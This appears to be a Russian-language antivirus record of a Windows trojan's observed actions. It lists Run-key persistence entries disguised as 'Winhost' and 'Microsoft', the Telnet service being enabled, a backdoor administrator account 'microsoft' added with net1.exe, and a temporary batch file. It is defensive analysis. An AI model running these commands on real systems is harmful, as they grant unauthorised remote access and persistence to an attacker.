Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Winhost' = '<SYSTEM32>\server.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft' = '<SYSTEM32>\ipjuego.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <SYSTEM32>\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winhost /t REG_SZ /d <SYSTEM32>\server.exe /f
- <SYSTEM32>\net1.exe user microsoft micro /add
- <SYSTEM32>\net1.exe localgroup "Administradores" microsoft /add
- <SYSTEM32>\cmd.exe /c ""%WINDIR%\Temp\a00838.bat" <Полный путь к вирусу>"
- <SYSTEM32>\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f
- <SYSTEM32>\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d <SYSTEM32>\ipjuego.exe /f
- <SYSTEM32>\Server.exe
- %WINDIR%\Temp\a00838.bat
- <LS_APPDATA>\Server.exe
- %WINDIR%\Temp\a00838.bat